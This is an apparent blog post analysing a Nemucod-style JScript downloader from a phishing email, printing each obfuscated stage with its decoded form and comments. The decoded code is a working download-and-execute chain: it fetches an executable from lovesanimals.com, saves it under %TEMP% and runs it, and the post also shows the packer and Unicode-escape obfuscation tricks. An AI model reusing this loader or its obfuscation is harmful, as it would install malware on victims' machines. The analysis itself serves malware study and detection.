Monday, May 9, 2016

Virus Analysis (UNPACKED...)

In the last email, I obtained a virus similar to a Nemucod ransomware from the virus report...


Code analysis :

===================================
INIT
===================================

// NSPR-style file-mode flag names, one bit each (0x01 .. 0x80).
// In the visible script only PR_RDONLY is read again: it is the end
// index handed to substring() inside String.prototype.provisionally.
var PR_RDONLY = 1 << 0;
var PR_WRONLY = 1 << 1;
var PR_RDWR = 1 << 2;
var PR_CREATE_FILE = 1 << 3;
var PR_APPEND = 1 << 4;
var PR_TRUNCATE = 1 << 5;
var PR_SYNC = 1 << 6;
var PR_EXCL = 1 << 7;

// Filler: a fragment of jQuery source assigned to an implicit global and never read.
GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
// Each parenthesised comma list evaluates to its last element ("ro"), so the
// indexer spells "fromCharCode"; 7*2*7 + 0 = 98, hence daunt === "b".
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
// Decoy method name. ("suZstring").replace("Z", daunt) -> "substring", so this
// is this.substring(0, PR_RDONLY): it returns the receiver's first character.
// The rest of the script uses it to pull single letters out of junk words and
// assemble API names one character at a time.
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

/*
 * MD5 of an input stream via XPCOM (Gecko's nsICryptoHash), returned as
 * lowercase hex. This is the well-known MDN sample; `Components` does not
 * exist in Windows Script Host, and neither this nor hex_md5 is invoked
 * anywhere in the visible script, so it serves as padding here.
 */
function hex_md5_stream(stream) {
  var md5 = Components.classes["@mozilla.org/security/hash;1"]
    .createInstance(Components.interfaces.nsICryptoHash);
  md5.init(md5.MD5);
  md5.updateFromStream(stream, stream.available());
  // finish(false) yields a binary string: one byte per char.
  var raw = md5.finish(false);
  var hexParts = [];
  for (var idx = 0; idx < raw.length; idx++) {
    var byteHex = raw.charCodeAt(idx).toString(16);
    hexParts.push(byteHex.length == 1 ? '0' + byteHex : byteHex);
  }
  return hexParts.join('');
}


===================================
FUNCTION PICK
===================================

/*
 * MooTools-style $pick: return the first argument that is neither
 * undefined nor null, or null when there is none. Falsy values such as
 * 0, "" and false are kept, since the test is a loose `!= null`.
 */
function pick() {
  var candidates = arguments;
  var count = candidates.length;
  var idx = 0;
  while (idx < count) {
    var candidate = candidates[idx++];
    if (candidate != null) return candidate;
  }
  return null;
}


===================================
FUNCTION BASE64DECODE
===================================

// Base64 decoder boilerplate attached to the script-level `this` (the WSH global).
// `decode` aliases base64decode below; `chars` builds the lookup table it uses.
this.decode = base64decode;
// Builds base64EncodeChars / base64DecodeChars as implicit globals (no `var`).
// The table maps a char code 0..127 to its alphabet index, or -1 for anything
// else. For i >= 64 charCodeAt(i) is NaN, so those iterations also set a stray
// "NaN" property -- harmless, but a sign the loop was written loosely.
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
// Populate the table with the standard alphabet at load time.
this.chars();
/*
 * Decode a Base64 string using the global `base64DecodeChars` table
 * (alphabet index per char code, -1 for anything else). Bytes that map
 * to -1 are skipped; "=" in the third or fourth position of a quantum
 * ends decoding; running out of input mid-quantum stops as well.
 * Returns the decoded bytes as a string, one char per byte (not UTF-8 aware).
 */
function base64decode( str ) {
  var total = str.length;
  var cursor = 0;
  var out = "";

  /*
   * Read the next 6-bit value, skipping bytes that map to -1 until one
   * is found or the input is exhausted (then -1 comes back). When
   * `padEnds` is set, a raw "=" (0x3d) yields the sentinel -2 instead.
   */
  function nextSextet(padEnds) {
    var value;
    do {
      var code = str.charCodeAt(cursor++) & 0xff;
      if (padEnds && code == 61) return -2;
      value = base64DecodeChars[code];
    } while (cursor < total && value == -1);
    return value;
  }

  while (cursor < total) {
    var s1 = nextSextet(false);
    if (s1 == -1) break;
    var s2 = nextSextet(false);
    if (s2 == -1) break;
    out += String.fromCharCode((s1 << 2) | ((s2 & 0x30) >> 4));

    var s3 = nextSextet(true);
    if (s3 == -2) return out;
    if (s3 == -1) break;
    out += String.fromCharCode(((s2 & 0xF) << 4) | ((s3 & 0x3C) >> 2));

    var s4 = nextSextet(true);
    if (s4 == -2) return out;
    if (s4 == -1) break;
    out += String.fromCharCode(((s3 & 0x03) << 6) | s4);
  }
  return out;
}


===================================
Calling Windows Script Host
===================================

// Host fingerprint: in Windows Script Host, String(WScript) is "Windows Script Host".
// Only then is the base64 payload evaluated; per the CONVERSION section below it
// decodes to a single assignment that sets `thenDo`, the gate for everything after.
// Any error (e.g. WScript not defined in a browser or a sandbox that does not
// emulate it) is swallowed, so outside WSH the script does nothing visible.
try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

// Decoded form of the eval'd string from the previous section. `thenDo` is not
// assigned earlier in the visible code and `String.prototype.provisionally` was
// defined in INIT, so the value comes from eval("true"): thenDo becomes true
// wherever eval actually works -- presumably a check that the host is a real
// script engine rather than a static emulator.
if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
// Stray in this excerpt: this catch is the one from the try in the previous
// section; there is no matching try here.
}catch(Eeed)
{

}


===================================
FUNCTION
===================================

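/**
 * Normalise a CSS colour to six-digit lowercase hex ("#rrggbb").
 * Prototype.js-era helper accepting "rgb(r, g, b)", "#rgb" and "#rrggbb";
 * unused by the rest of the visible script (library filler).
 *
 * @this {string} the colour text
 * @param {string} [fallback] - returned when the value cannot be parsed;
 *   defaults to the original string (`this`).
 * @returns {string} "#rrggbb", or `fallback` / the original when unparsable
 */
String.prototype.parseColor = function (fallback) {
  var color = '#';
  if (this.slice(0, 4) === 'rgb(') {
    // Three decimal channels. Radix is explicit so values such as "08" are
    // never read as octal/hex. toColorPart (Number.prototype, defined by the
    // host library, not on this page) is expected to yield two hex digits.
    var channels = this.slice(4, this.length - 1).split(',');
    for (var c = 0; c < 3; c++) {
      color += parseInt(channels[c], 10).toColorPart();
    }
  } else if (this.slice(0, 1) === '#') {
    if (this.length === 4) {
      // "#abc" -> "#aabbcc"
      for (var i = 1; i < 4; i++) {
        color += (this.charAt(i) + this.charAt(i)).toLowerCase();
      }
    }
    if (this.length === 7) color = this.toLowerCase();
  }
  // Anything that did not produce exactly "#rrggbb" falls back.
  return color.length === 7 ? color : (fallback || this);
};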


===================================
PACKER
===================================

// Dean Edwards "p,a,c,k,e,r" stage: the quoted payload has every identifier
// replaced by a base-62 token and the '|'-separated list (165 words) is the
// dictionary used to restore them; the decoded result is shown in the next
// section. Note that `c35?` is not valid JavaScript -- the standard packer
// reads `(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?`, and the part starting at
// `<a` was apparently swallowed as an HTML tag when this page was extracted.
// The break after `";3 ` is likewise a page wrap inside the quoted payload.
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 
2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

// Unpacked stage 1. Every (..., "x") list collapses to its last element, so this
// is a plain list of API names consumed from the front with shift() and from the
// back with pop(): "ActiveXObject", "ExpandEnvironmentStrings", "%TEMP%", ".exe",
// "Run", "MSXML2.XMLHTTP", "WScript.Shell" -- the usual WSH download-and-run set,
// and the strings worth hunting for when this family is suspected.
var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
// Filler (jQuery source). The raw line breaks are the analyst's reformatting; a
// JavaScript string literal cannot span lines like this in the running script.
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
// shift() -> "ActiveXObject"; `this` is the WSH global object, so this aliases
// the ActiveXObject constructor under a random name for the rest of the script.
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

/*
 * MD5 of a string, as lowercase hex, by wrapping it in a Gecko
 * nsIStringInputStream and delegating to hex_md5_stream. Like that
 * function it needs XPCOM (`Components`), which Windows Script Host
 * lacks, and it is never called in the visible script.
 */
function hex_md5(s) {
  var input = Components.classes["@mozilla.org/io/string-input-stream;1"]
    .createInstance(Components.interfaces.nsIStringInputStream);
  input.setData(s, s.length);
  var digest = hex_md5_stream(input);
  return digest;
}


===================================
DATA
===================================

// Single letters harvested with provisionally() (= first character of the
// receiver, see INIT). The comma lists again reduce to their last element.
// titular: ("pPNMxaXgtPqQ" + "OkqCnGIqrgI") -> "p"
titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
// boughts: ("shzrRkSc" + "rFfvhMdqAeh") -> "s"
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
// vietnamese: ("n" + "ep" + "o").split("") -> ["n","e","p","o"]; reversed and
// joined later it spells "open" (the XMLHTTP method name).
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
// Filler: jQuery source, never read.
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

// Second packer stage (same packer family, radix 9, plain decimal tokens via
// e=String). The dictionary is itself lightly obfuscated: 'BUk' becomes 'BHpUk'
// through the .replace('U','HpU') before the split. Decoded in the next section.
eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

// pop() -> "WScript.Shell"; pick() merely returns its first non-null argument,
// so XtpJu is a WScript.Shell instance (used later to expand %TEMP% and to Run).
rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
// pop() -> "MSXML2.XMLHTTP": the HTTP client that performs the download.
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

// Filler.
pYzoVKAO = " global: {},";
// shift() -> "ExpandEnvironmentStrings", shift() -> "%TEMP%": resolves the
// user's temp directory, which becomes the drop location. BHpUk now holds
// [".exe", "Run"].
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
// Filler.
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

// Third packer stage, evaluated only when the host check set `thenDo`;
// decoded in the next section (it defines saloHood, the entry point).
if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

// Repeat of the three statements from the previous section (analyst's
// reconstruction); same effect.
pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
// Decoded third packer stage. In this excerpt the `{` is never closed; in the
// packed original it closes immediately after saloHood.
if(thenDo){
// First character of ("ESOHGNPaReb" + "RbtJGwV") -> "E"; later wrapped as
// "G" + indicatede + "T" to spell the HTTP verb.
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
// Math.random() is in [0, 1), so the `empty > 0` test in quickwitted is true
// except for a vanishingly rare exact 0 -- effectively an opaque predicate.
var empty=Math.random();
// Entry point of the chain; invoked once at the very end of the script.
// hoddor and quickwitted are defined in the sections that follow.
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

// Download host and path, written as \u escapes of plain ASCII and split into
// two literals -- presumably to defeat naive string matching. The CONVERSION
// section below shows the decoded value; saloHood prepends "http://".
var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

// Decoded download location (host + path); the scheme is added by the caller.
// The original splits the literal in two, which changes nothing at runtime.
var hoddor = "lovesanimals.com/09y8hb7v6y7g";

===================================
FUNCTION QUICKWITTED
===================================

// Download-and-execute routine. The try opened here is closed in the FINAL
// section; the fourth packer stage is evaluated inside it.
//   expulsion: URL to fetch ("http://" + hoddor)
//   proved:    base name of the dropped file ("OYWVCwQ")
function quickwitted(expulsion, proved) {
try {
// shift() -> ".exe": francisco = <TEMP>/OYWVCwQ.exe, the drop path.
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
// Filler.
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
// `empty` is Math.random(), so this branch is taken in practice.
if (empty > 0) {
// vietnamese reversed -> "open"; "G" + indicatede ("E") + "T" -> "GET":
// a synchronous (third argument false) XMLHTTP GET of the URL.
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
// Filler.
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
// boughts ("s") + "e" + first char of "nXyuIYg..." ("n") + first char of
// "dWoQFifU..." ("d") -> "send": performs the request.
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
// Filler.
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

// Fourth packer stage (radix 62, 241 dictionary words), run inside quickwitted's
// try after send(); decoded in the next section. As with the first packer,
// `c35?` is extraction damage: the standard source reads
// `(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?`. The line breaks inside the quoted
// payload and inside the dictionary ("se / parated") are page wraps as well,
// not part of the script.
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? 
b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|se
parated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

// Decoded fourth stage: write the response to disk and launch it. Nothing is
// written or run unless the XMLHTTP request came back with HTTP 200.
if(NBHAYvL.status==200)
{
// ("" + "A" + "pO" + "DB." + "" + "S" + "tr" + "eam").replace("p","D")
// -> "ADODB.Stream": the binary file writer.
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
// "o" + "pen" -> open()
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
// Filler (jQuery source, line breaks from the analyst's reformatting).
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
// type = 1 (adTypeBinary): the stream carries raw bytes.
OkUvN.type=0+3-2;
// Filler.
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
// "w" + "ri" + "te" -> write(NBHAYvL["R"+"es"+"pon"+"s"+"e"+"Bo"+"dy"]):
// copies the downloaded ResponseBody into the stream.
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
// Filler.
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
// (titular "p" + "o" + "Di" + "ti" + "on").replace("D", boughts "s")
// -> position = 0: rewind the stream before saving.
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
// Filler.
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
// "s" + "av" + "eT" + "oF" + "ile" -> saveToFile(francisco, 2)
// (2 = adSaveCreateOverWrite): writes <TEMP>/OYWVCwQ.exe.
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
// Filler.
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
// Filler.
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
// shift() -> "Run": WScript.Shell.Run(path, 1, false) -- normal window, do not
// wait for exit. Detection angle: wscript.exe writing an .exe under %TEMP% and
// launching it moments later.
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
// Filler.
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

// Closes the try opened in quickwitted: any failure in the download, write or
// Run chain is discarded, so the script never surfaces an error to the user.
} catch (rzupeJz) { };
// Filler.
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
// End of quickwitted.
}
// The one top-level call that does any work: kicks off the whole chain
// (GET http://<hoddor> -> <TEMP>/OYWVCwQ.exe -> Run).
saloHood();
// Filler.
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64